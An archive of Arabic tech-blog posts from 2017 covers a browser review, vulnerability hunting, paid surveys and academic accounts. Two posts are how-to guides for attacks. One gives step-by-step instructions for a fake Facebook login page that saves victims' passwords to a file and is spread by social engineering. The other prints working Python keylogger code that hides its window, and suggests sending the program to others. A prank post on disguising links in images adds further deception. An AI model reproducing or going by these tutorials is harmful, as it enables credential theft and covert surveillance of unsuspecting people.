2017 - مدونة الحاسوب

مدونة تهتم بالحاسوب والبرامج وبرمجة الاكواد وانشاء روابط وتعليم الاختراق والمواقع ا https://compterworld.blogspot.com/

الثلاثاء، 26 ديسمبر 2017

إذا كنتم تتذكرون متصفح  Puffin  لهواتف الأندرويد حيث يوفر تصفح آمن جدا وسرعة أنترنت تفوق 600m/s ، هذا المتصفح لم يكن متوفرا لأنظمة التشغيل الأخرى إلا أنه الآن قامت بإطلاقه الشركة للوندوز حيث أصبح بإمكانك الإستفادة من كل مميزاته وسرعته إذا كنت تتوفر على الحاسوب .
هذا المتصفح  يستعمل تقنية السحابة التخزينية لضغط الصفحات وحمايتك من المواقع الضارة وتصفحها بسرعة عبر خدمة الإتصال بسيرفر أمريكي بعد استعمالك له بشكل تلقائي ما يوفر لك سرعة في الأنترنت عند التصفح وأيضا حماية كبرى ، كما تفيد أيضا تقية السحابة التخزينية التي يستخدمها في تقليل استهلاك الرام و المعالج مقارنة بالمتصفحات الأخرى ما يجعلك حاسوبك لا يتأثر عند استخدامه ، وعلى مستوى السرعة التي يقدمها فهذه مقارنة قمت بها على كل من متصفح غوغل كروم وهذا المتصفح Puffin والنتيجة كانت هائلة كما هو موضح في الصورة :
عند استعمالك لمتصفح Puffin فلن تحتاج إلى تفعيل وضع التخفي أو استعمال برامج ال VPN أو تغيير ال IP ، حيث يقوم هو بشكل تلقائي بهذه المهمة وهو ما يفيد أيضا حتى عند استعمالك للشبكات العامة أو المفتوحة ، وإذا كنت تستعمل الموديم على الحاسوب أو 3G و 4G على الهاتف فهو يحافظ على باقة الأنترنت ولا يستهلكها كثيرا .
رابط تحميل  المتصفح  للوندوز والأندرويد و ال IOS على الموقع الرسمي

الثلاثاء، 12 ديسمبر 2017



ثغرات الانظمة 
الانظمة منها الويندوز او اللينكس او ادوبي بلير او الماسنجر كلها انظمة تشغيل وهذه الانظمة تعتمد على المنافذ لان كل منها لها منفذ خاص بها 
ماهو المنفذ هو عبارة عن باب (بوابة) لتبادل المعلومات يستخدمها نظامك لالاتصال بباقي الكومبيوترات من خلال الانترنيت
والملخص هو كل برنامج يعتمد على الاتصال بالانترنيت له منفذ خاص به
الثغرة ماهي هي ؟ هي الية فهم النفذ (البورت) ماذا يرسل وماذا يستقبل 
نواع الثغرات
نوع الثغرة هو نفسة نوع المنفذ التي يتم إكتشاف الثغرة فية
والمنافذ لها نوعين
منفذ دائم : وهو الي يشتغل مع إشتغال برنامج ما
هل تريد أن ترى المنافذ الدائمة في جهازك لا تنسى تقول ماشاء الله اللهم زد وبارك
شغل الدوس وأكتب
netstat -a -n -o
تظهر لك قائمة طويلة عريضة - المنفذ يأتي بعد عنوان الجهاز و علامة: بهذا الشكل
127.0.0.1:587
منفذ = 587
أما آخر قائمة التي عنوانها PID
فهي رقم العملية(البرنامج) في الذاكرة التي يستقبل الأوامر من المنفذ
والنوع الثاني : الثغرات المؤقتة = المنافذ المؤقتة
في بعض العمليات التي تتم على الإنترنت تكون بشكل مؤقت
مثلا لتحميل أداة أكتف إكس نحتاج لمنفذ لنقل الأداة من الشبكة إلى الجهاز
تتطلب بعض السكربتات وخاصة الكبيرة منفذ للنقل وسرعة التنفيذ
تتطلب بعض برامج قرائة البريد مثل الأوت لوك منفذ مؤقت للرد المباشر على الرسائل
هذي كلها منافذ مؤقتة ينشأها النظام في وقت معين وبعد التنفيذ يغلق المنفذ وتكون مخفية
للمعلومة : كل الثلاث منافذ التي تم عرضها ظهر فيها ثغرات وتم تعديلها
هذا بالنسبة لأنواع الثغرات يمكن تكون في أنواع ثانية الله أعلم
طريقة إكتشاف الثغرات
في أكثر من طريقة: الأولى
إسمع القصة وبتفهم أول طريقة
قبل فترة جمعت كل تحديثات الأمان مع بعض وأردت أركبها في نظام قديم
قلت بجرب وبكتشف كيف تعمل هذة التحديثات تغلق ماذا وتفتح ماذا
بدأت أشغل كل تحديث ببرنامج تصحيح للخطاء( الديبغر) وأسجل ملاحظات
وأعيد تشغيل الكمبيوتر وأفتح الدوس وأكتب
netstat -a -n -o
والله السالفة طلعت تشبة لعبة الشرطي والحرامي
قبل تثبيت أي تحديث كان عدد المنافذ 12 وبأرقام مختلفة طبعا
بعد تثبيت التحديثات صارت المنافذ 9 وعناوين المنافذ نفس ماهي أقصد أول تسعة
بديت أثبت واحد ورى الثاني ويتم التغيير كما يلي
تقوم بعض التحديثات بعمل مشاركة بين منفذ تم إكتشاف ثغرة فية وبين آخر سليم
مع تعديل في الكود
طريقة مشاركة المنافذ تخلي النظام بطي + أن الي أكتشف الثغرة
سهل يحمل التحديث ويشوف التعديل وبترجع الثغرة زي ماكانت
قلت في بالي والله إن القراصنة عقدوا مايكروسفت وبتكون نهاية الشركة على أيديهم ؟
أعتقد فهمت أول طريقة وهي تحميل تحديث لثغرة وتقوم بتنقيح هذا التحديث لتعرف الثغرة
مثل الي يريد يتعلم كسر حماية برنامج يدور لة على كراك وبعد ما يكسر البرنامج يشوف الفرق قبل وبعد
لا تتوقوعوا إن لينكس فقط مفتوح المصدر أيضا وندوز مفتوح المصدر ولكن بطريقة ملتوية فك التجميع
قد تكون هذة الطريقة أسهل طريقة ولكن الثغرة تكون قد أغلقت؟ولكن تستفيد منها في إكتشاف ثغرة جديدة
الطريقة الثانية
ببرامج التنقيح أيضا : لتحميل برنامج تنقيح محترم
حدد البرنامج الذي يفتح ثغرة دائمة أو مؤقتة
إفتح البرنامج وسوي تخطيط للذاكرة للتعرف على كل الملفات التي تتعلق بهذا البرنامج
مثل ماتلاحظ: تخطيط لبرنامج 40 بالمئة من تحديثات الأمان عند التحديث كانت فية
ما أدري الكود الي هنا ليش ما ظهر  يمكن يكون أكبر من الصفحة
كل ملف تجدة في القائمة إفتحة وضع نقاط توقف على كل دوال الإتصالات
طبعا بعض الملفات معروفة ولا تخص البرنامج مثل المكاتب
user32.dll ,kernel32
وباقي ملفات النظام القياسية ركز على ملفات البرنامج الملفات الغريبة؟
وشغل البرنامج وإتصل بالإنترنت وتجول على كيفك حمل برامج سوي أي شيء
أول ما تلاقي برنامج التنقيح عطاك إشارة أنة دالة عليها نقطة توقف تحاول الإتصال
وقف وإفتح البرنامج وتتبع البرنامج قد تلاقي شيء أو بعض هذة الأفكار
إستقبال حجم كبير من المعلومات يكفي لنقل فايروس بشكل غير مشروط جداا
فتح منافذ مؤقتة جديدة
أو أي طريقة لزرع ملف تجسس
طبعا لازم تكون ذكي وعندك خبرة في البرمجة لإكتشاف هذي الشغلات وأهم شيء عندك صبر وإرادة
وإذا ما لقيت شيء كمل حتى تلاقي : لايمكن أن تلاقيها في يوم وليلة
هذي البرامج مصممة ومجربة على يد خبراء برمجة وأمن مو حيالله
وللمعلومة : أغلب الثغرات تكتشف في 3 إلى 6 أشهر من التدقيق والمراقبة
المهم : هذي الطريقة هي أكثر الطرق المتبعة لإكتشاف للثغرات
الطريقة الثالثة
مراقبة مخزن بيانات المودم + إتصالات المودم
قد تكون هذة الطريقة مقدمة للدرس القادم : قراصنة الإتصالات السلكية والاسلكية
نبدأ :في برامج كثيرة لمراقبة مخزن المودم + مراقبة تعليمات المودم AT
وهذا واحد منها
قبل أن تتصل بالنت شغل البرنامج وإختر ملف ثم جلسة جديدة
تظهر لك خيارت المراقبة إختر لأولى منفذ تسلسلي
تظهر لك خيارت للمنفذ إختر منها منفذ المودم
ثم تظهر لك خيارات التعليمات التي تريد إظهارها حدد أول خمس
بعد ذلك صغر البرنامج وإتصل بالنت و عند الإتصال إطلع على البرنامج
لاحظ البرنامج المستخدم في الإتصال+ لاحظ كيف يتم نقل المعلومات + لاحظ تعليمات المودم
كما هو موضح في الصورة
smmon.gif
المعلومات التي تشوفها في الصورة
يحتاج لها درس خاص وإن شاء الله نتطرق لها في الدرس القادم
المهم : هذة بعض الطرق لإكتشاف ثغرات النظام وماخفي كان أعظم
وفي شيء آخر : لا تتوقع أن نظام التشغيل وندوز نظام غير آمن
بل أعتقد أنة أأمن نظام تشغيل معروف في العالم. ولو أن أي نظام تشغيل ثاني تعرض
لمحاولات قرصنة مثل نظام وندوز لكان الآن في عداد الأموات
وستضل الحرب بين الأمن والإختراق . إلى أن يشاء الله
ثانيا : نظام لينكس
نظام لينكس أمام هذة الطرق في كشف الثغرات يعتبر شيء سخيف
لو تريد كشف ثغرة في لينكس بكل بساطة لا تحتاج لكل هذة الطرق والبرامج
بل تحتاج لبرنامج واحد فقط وهو ( محرر نصوص)؟؟؟؟؟؟؟؟؟؟؟؟
لكي تفتح الشفرة المصدرية للينكس وترى بعينك كيفية تصميم طرق الأمن فية
وتكتشف الثغرة
أخيرا: أنا لا أقصد من كل هذا الدرس أن كشف ثغرات الأنظمة شيء بسيط
كشف الثغرات والله شيء معقد وكأنك صححت خطأ في نظام تشغيل؟؟ غفل عنة خبراء برمجة

الاثنين، 20 نوفمبر 2017




       خدعة اختراق الفيس بوك 
الكثير منا يرغب احيانا ان يخترق فيس احدهم ربما لسبب معين او لمجرد اللهو 
وبما انه لا يعرف طرق الاختراق وكيف يتم ذلك يلجاء الى اسهل الطرق وهي اما مواقع تقول لك تفضل اخترق الفيس واما برامج جاهزة وهي ملغمة اصلا وهذه البرامج لاتكون مستهدفة وانما عشوائية الاستهداف لنتكلم عن هذه المواقع التي انا قمت بتجربتها هنا 
مثلا هذا موقع عندما تدخل اليه تراه ضخم وجدي ويدعوك للتسجيل في المواقع مع بعض الامتيازات الزائفة طبعا 
الموقع هنا كما ترونه جدي وضخم ومناسب للاختراق ويوعدك بمساعدتك 
يجب ان تسجل فيه طبعا لنجربها حيث قمت بالتسجيل فيه للتجربة طبعا

كما ترون بعد الدخول الى الموقع سيطلب منك اكمال البيانات ونوع النظام المستخدم انا بالطبع لم ازود اي بيانات حقيقة وبعد الضغط علا التالي سنتوجه الى صفحة يطلب منك شراء الخدمة 

نصيحة مني لا تدفعوا قرشا لانها نصب واحتيال بدرجة احترافية عالية جدا بحيث بعد الدفع سيتم حضرك من الموقع وحفظ اي بي الخاص بجهازك العلني 
وهذه بعض هذه المواقع الاحتيالة ايضا 



اما ان كنت تعرف الاختراق فاعتقد انك ستكون عليما بطريقة برمجة برنامج او تطبيق اختراق او بعمل كي لوجر خاص بك واستعمال برامج موجوده جيده ثبتت انها ليست ملغمة لان يجب عليك تحميلها من المواقع الاصلية لها واما الصفحات المزورة هي الاخرى طريقة ناجحة للاختراق وطرق بناء فايروس اختراق جيدة ايضا توجد طرق حقيقية للاختراق ولكن يجب ان تتعب وتتعلمها او تختص بواحدة منها لاتنسى الهندسة الاجتماعية مهمة جدا في الاختراق 

نصيحة مني 
لاتتعلم اذية الناس البسطاء لمجرد اثبات انك خبير بل بالعكس طور نفسك في تعلم الاختراق والاختراق العكسي لمساعده الناس هناك اسبوعيا تاتيني الرسائل تسالني علا مساعدتهم للاختراق لكن انا لست من هذا النوع اساعد لكن بحدود معينة طبعا

الثلاثاء، 7 نوفمبر 2017

إخترت لكم موقعين متميزين لتحميل مشاريع برمجية في مختلف لغات البرمجة
موقع Code Project :
موقع بمثابة كنز للمبرمجين لكثرة المميزات التي يحتويها من أكواد جاهزة في مختلف اللغات البرمجية بالإضافة إلى إمكانية طرح الأسئلة و الإستفسارات ونقاشات بين المبرمجين الأعضاء والمزيد ...
بعد الدخول للموقع يجب أن تقوم بالتسجيل عبر البريد الإلكتروني الخاص بك في القائمة العلوية أو تسجيل الدخول إن كنت تملك حساب مسبقا 


نظغط على Sign In لإنشاء حساب جديد أو يكمن التسجيل عبر حساب الفيس بوك أو قوقل بلس أو لينكد إين أو ميكروسوفت إختر ما يناسبك منها , إذا إخترت التسجيل عبر البريد الإلكتروني يجب عليك تفعيل الحساب من خلال رسالة ستصلك عليه تجد فيها رابط التفعيل .
بعد التفعيل يمكنك البدء في تحميل المشاريع البرمجية التي تريد .

طريقة التحميل سهلة كل ما عليك هو الضغط على المشروع الذي تريده لتنتقل مباشرة لصفحة التحميل , هذا مثال لمشروع أريد تحميله كما ستجد شرح كامل للكود في الأسفل .


رابط الموقع من هنا .



موقع FREE PROJECTS CODE :
هذا الموقع مشابه للسابق يمكنك من تحميل المشاريع بطريقة سهلة دون الحاجة للتسجيل

كل ما عليك هو الضغط على المشروع البرمجي المناسب لك ثم ستجد شرح له وبعده رابط التحميل .رابط الموقع من هنا .


الجمعة، 6 أكتوبر 2017

السلام عليكم 
هذه احدى طرق اخفاء او جمج رابط مع صورة بحيث من يضغط اي شخص على الصورة سيتم تحويله الى صورة اخرى ان كنت تنوي اخافة احدهم وكذلك يمكن دمج رابط او سرفر مع الصورة ونشرها على الفيس بوك او اي موقع تواصل اجتماعي اخر 
الخطوات 

1-نقوم بتحضير صورة شيقة يغري الشخص للضغط عليه مثلا انا اخترت هذه الصورة 



كما ترون صورة لا باس بها لعمل خدعة تخويف 

2-- نذهب الى موقع جوجل ونختار رابط صورة حسب الرغبة انا هنا ساختار صورة مرعبة حسنا   ونقوم بنسخ رابط الصورة 






3- نذهب الى موقع سوشال لينك ميكر ونضع رابط الصورة في اول خانة

ونختار الصورة من جهاز الكومبيوتر 






وبعد نسخ الرابط نقوم بنشره على الفيس بوك واي شخص يضغط على الصورة سيتم تحويله الى الصورة المرعبه 
وكمثال هنا هذا الرابط         https://goo.gl/qpJ9cc

رابط موقع سوشال لينك ميكر هنا 


وشكرا لكم 

الأحد، 1 أكتوبر 2017

موقع جميل وسهل الاستعمال (Speechlogger) 
الموقع يدعم اللغة العربية وحوالي 12 لغة  اخرى  تستطيع استعمال الموقع لتسجيل الترجمة الفورية 

وذلك بنطقك للجمل المرادة ترجمتها   وسيقوم الموقع بنطقها لك ايضا وكذلك توجد امكانية كتابة الكلام وترجمتها 

والموقع يتيح لك حفظها في ملفات مؤقتة او حفظها على حاسوبك ايضا ويمكن ارسال الترجمة عبر الايميل الى اي شخص اخر 

وكذلك يتيح لك تصيديرها الى جوجل درايف او تصديرها على شكل ملف تكست 

والموقع مدعوم من قبل ترجمة جوجل 

ارجو ان تكونوا قد استفدتم منها 

لان هذا الموقع من النادر وجوده بهذا الشكل الرائع 

السبت، 16 سبتمبر 2017

اصبح الامن الاكتروني ضرورة قصوى للجميع ان كانو مستخدمين او خبراء في هذا المجال وبفضل الانترنيت اصبح الجميع باستطاعته التعلم واخذ خطوة في هذا المجال القوي 
و "KALI Tools" ويعد أكبر مخزن لكل برامج الاختراق الاخلاقي ، حيث يوفر لك العديد من الادوات وشرحها وطريقة استعمالها .
الطريقة سهلة للتعلم كل ماعليك فعله هو النقر على اي اداة وسترى الاداة وطريقة استعمالها والشرح الكامل لها وتحميلها من الموقع الرسمي لها ان امكن ذلك 
ان كنت شغوفا في هذا المجال 
الموقع الرسمي من هنا

وشكرا لكم مقدما للزيارة

الأربعاء، 13 سبتمبر 2017

لكي تتمكن من انشاء حساب (بريد) اكاديمي في جوجل scholar.google يجب ان يكون لديك حساب جي ميل  وعملية انشاء حساب جي ميل معروفة وبسيطة للغاية لا تحاتج الى شرح
بعد انشاء بريد جي ميل نتوجه الى الرابط التالي الدخول الى scholar.google
https://scholar.google.com/

وبعد الدخول الى الرابط سنتوجه الى الكلمة (my citations) ليفتح لنا صفحة عمل وتاسيس بريد اكاديمي 


وما ترون  يجب املاء الحقول حسب ماهو ترونه ولكن حسب الاختصاص طبعا 
وبعد الانتهاء من املاء الحقول نضغط على التالي لنتوجه الو صفحة اخرى
ونضيف البحوث التي نرغب بها الة بريدنا 
وبعد ذلك نضغط على التالي لنتوجه الى صفحتنا او بريدنا الرئسيس اللذي تم انشاءوه
وهنا كما ترون صفحتنا عبارة عن صفحة خاصة ويحب تحويلها الى عامة

وبهذا       نكون قد اسسنا بريد اكاديمي لنا وشكرا لكم






السبت، 9 سبتمبر 2017

لديك شئ اكيد وقت فراغ وتتصفح فيه الفيس بوك وبعض مواقع التواصل الاجتماعي حسنا لماذا لا تربح المال خلال تصفحك الانترنيت 

لان هنالك مواقع تدفع لك مبالغ وان كانت قليلة ولكن بالصبر والمثابرة سوف تجمع المال الذي تستطيع فيه الاستفادة منها وهنا فيديو يشرح العملية برمتها والروابط تجدونها اسفل الفيديو 
















الأحد، 3 سبتمبر 2017

ماالمقصود بالتصيد الاحتيالي ؟
ففي مجال امن الكومبيوتر التصيد الاحتيالي هو عملية جنائية من خلال التنكر بمواقع او صفحات للحصول على معلزمات المستخدمين من اسماء وكلمات سر ومعلومات عن بطاقات الائتمان  من خلال تنكر ككيان جدير بالثقة في الاتصالات الإلكترونية. الاتصالات التي يزعم أنها من مواقع اجتماعية اجتماعية شعبية، ومواقع المزاد، ومعالجات الدفع عبر الإنترنت أو مسؤولي تكنولوجيا المعلومات تستخدم عادة لإغراء الجمهور المطمئنين. وعادة ما يتم التصيد عن طريق البريد الإلكتروني أو الرسائل الفورية، وغالبا ما يوجه المستخدمين لإدخال التفاصيل في موقع ويب وهمية الذي الشكل والمظهر هي مطابقة تقريبا لتلك المشروعة. يعد التصيد الاحتيالي مثالا على تقنيات الهندسة الاجتماعية المستخدمة لخداع المستخدمين، كما أنه يستغل سوء استخدام تقنيات أمان الويب الحالية. وتشمل المحاولات الرامية إلى التعامل مع العدد المتزايد من حوادث التصيد الاحتيالي المبلغ عنها التشريعات، وتدريب المستخدمين، والتوعية العامة، والتدابير الأمنية التقنية.
المفهوم الأساسي للخداع: -
مؤخرا نشرت لي دروس حول كيفية القيام بالتبويب  ووناقشت هناك استخدام صفحات التصيد. لذلك،  وسوف تظهر لك صفحة الفيسبوك التصيد والطريقة على كيفية جعل هذه الصفحة.حقيقة

ملاحظة: كل هذا هو للوعي والغرض التعليمي. لا تكون مجنون بما فيه الكفاية لخداع الأبرياء
لذلك، القراصنة يجعل نسخة طبق الأصل من الفيسبوك، أوركوت، ياهو، مسن أو أي صفحة أخرى تسجيل الدخول إلى مواقع البنك ثم يستخدم البرنامج النصي للحصول على كلمة المرور واسم المستخدم ويضمن هذا البرنامج النصي في منتدى مجال تسجيل الدخول. أولا وقبل كل تحميل صفحة الفيسبوك التصيد هنا




وكما تلاحضون في الصورة   اعلاه هنا هو السورس الاصلي للفيس بوك بدون اي تدخل من الهاكرزوما يفعله القراصنة انهم يينسخون 
كل ما هو مصدر شفرة صفحة الفيسبوك التصيد واستبدال هذا الرابط مع استغلال الخاصة بهم. لقد أعطيت هذا استغلال مع اسم book.php في حزمة التحميل. لذلك، وسوف تصبح على النحو التالي:


بحيث عند تسجيل الدخول تذهب معلومات الشخص راسا الى القرصان وهنا لقطة توضح عمل كود php لسرقة المعلومات

ومامعنى ال explot  معناه الاستغلال من خلال اي برنامج لكتابة كود PHP المدرجة ضمن شيفرة الفيس بوك 

كيفية جعل هذه العملية ممكنة- (دليل خطوة بخطوة للتصيد الاحتيالي): -

1.First من كل ما سوف تحتاج استضافة مجانية. ويمكنك الحصول على استضافة من خلال هذا الموقع      http://www.110mb.com/                                   
                                           

2.Now، سوف تقوم بتحميل index.php و write.php إلى موقع الويب الخاص بك. كلاهما في حزمة التحميل                                                                     .
لتحميل استخدام  برنامج     فليزيلا أنا أيضا استعمل     مثل هذا البرنامج مفتوح المصدر للتعامل مع ملقمات بروتوكول نقل الملفات   موقع البرنامج             http://filezilla-project.org/download.php

                                           .

4.Now! يتم تحميل كل من الملفات وكان لديك لإرسال استضافة أو رابط موقع وهمية إلى الضحية [(استخدام الهندسة الاجتماعية لخداع الضحية، واختصار الرابط افضل

5.Victim يفتح الصفحة ويعتقد أن لها صفحة الفيسبوك الحقيقية وتسجيلات الدخول     هناك. لذلك سيتم تسجيل ضربات المفاتيح في استضافة في ملف تكست. في نصي  حددت اسمها هو password.txt. يمكنك تغييره.

6. خدعة أخرى لإرسال رابط هو عن طريق البريد الإلكتروني                               

                             
                   كيف      تبقى امنا   من التصيد الاحتيالي  ومن الهاكرز                                                    ,,,,,,,,,,,,,,,,,,,,,
اهم  شئ هنا هو عيونك التي يجب ان تبقى وتركز على الرابط وهل هو حقا  رابط سليم ام هناك اضافات لها  لان الروابط الصحيحة معروفة للجميع ولا تدخل الى مواقع مشبوهة اصلا  وتدعوك لتسجيل الدخول لمتابعة ماتحب ان تراه على المواقع      
   واستعمل احذث اصدارات المتصفحات لانها تكون محمية ببرامج انتي فايروس    
وشكرا لكم للمتابعة    

                            
                               

الكثير منا يبحث عن مصدر دخل اضافي فمابالك وانت جالس في البيت اثناء فراغك اليومي وبدلا من تضييع الوقت هباءا منثورا ادخل الى هذا الموقع الذي يدفع لك مبالغ نقدية تتراوح من 25 سنت الى 2.5 دولار لاخذك مجموعه من بيان الراي (سرفي)
والموقع انا استعمله منذ حوالي سنتين ولقد ربحت المال منهم ست مرات والموقع يدفع لك المال اذا وصل الى 25 دولار الى حساب بي بال او عن طريق صك او بطاقة الكترونية (جيفت كارد) 



وكما تلاحظون في الصور هذا المبلغ قد حصلت عليه اليوم   وذلك فقط عن طريق اجابتي لبعض الاسئلة  وكل ماعليك فعله هو التسجيل بالموقع وعلى ان تكون لديك حساب في موقع لينكدين لان كلما كثرت مواقع مشضاركاتك كثر طرح الاسئلة عليك لتربح منها وربط حسابك بالايميل ورقم الهاتف ليكون حسابك موثقا بصورة دائمة 
وللراغبين بالربح التسجيل في الموقع  

السبت، 2 سبتمبر 2017

يعتبر ال (كي لوجر) من البرمجيات الخبيثة طبعا ولكن الشركات تستعملها لمتابعة الموظفين ونشاطاتهم اثناء العمل ولا يمكن كشفها من قبل برامج الانتي فايروس لانها تكون محمية باكواد تراها البرامج على انها عاديه 
والكي لوجر نوعان 
1- مايسمى بالهارد وير مثال الفلاشة او اليو اس بي 
2- السوفت وير ومعناها برامج اما مفتوحة المصدر او مغلقة المصدر وهنا مربط الفرس اليوم
وبرمجة الكي لوجر تتم بعدة لغات برمجة ولكننا اليوم سنتكلم عن لغة بايثون للبرمجة لانها من اسهل اللغات وكل مانحتاج اليه هي هذه الادوات التي سوف يتم وضعها اسفل المقال 


اول تحميل يكون بتحميل بايثون 2.6.2
وثاني خطوة هي تحميل برنامج التالي 
الموضح باللون الازرق
والخطوة الثالثة هي تحميل الاضافة التالية 
وبعد الانتهاء من التحميل نذهب الى 

نقوم بفتح برنامج البايثون باختيار بايثون ايدل 
نذهب الى الاعلى ونقوم بفتح مشروع جديد
وعندها سيفتح لنا نافذة جديدة وكل ماعليك فعله هنا هو نسخ هذا الكود ولصقه في البرنامج واذا كنت ذو خبرة بلغة البرمجة يفضل كتابتها يدويا 
الكود هو 
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
 if event.Ascii==5:
        
_exit(1)

 if event.Ascii != 0 or 8:
 f=open('c:output.txt','r')
       
 buffer=f.read()
 f.close()
        
f=open('c:output.txt','w')
 keylogs=chr(event.Ascii)
       
 if event.Ascii==13:
 keylogs='/n'
 buffer += 
keylogs
 f.write(buffer)
 f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

وبعد الانهاء منها تقوم بحفضها 
وطبعا هنا انتهت عملية الحفظ بنجاح وكل ماعليك فعله هو الذهاب الى القرص سي وتبحث عن البرنامج الذي حفظته باسم معين وتفتحه وتجربه علا نفسك لان يجب تجربة الكي لوجر اولا لمعرفة ان كان يعمل وافتح البرنامج ولكن لن تراه لانه مخفي وبعدها افتح المفكرة او اي متصفح واطبع بعض الكلمات وبعد الانتهاء قم بالبحث عن ملف يدعى (output.txt)وسوف تجد ماكتبته في الملف 
بالمناسبة ان كنت ترغب بارساله الى اي شخص يجب عليك تحميل الملف او البرنامج على مواقع تحميل ملفات لكي تحصل على رابط تحميل 
وهنا روابط تحميل بايثون والاضافات الضرورية لنجاح العمل 
– Download Python: http://www.python.org/
– Download Pyhook: pyhook.sourceforge.net
– Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/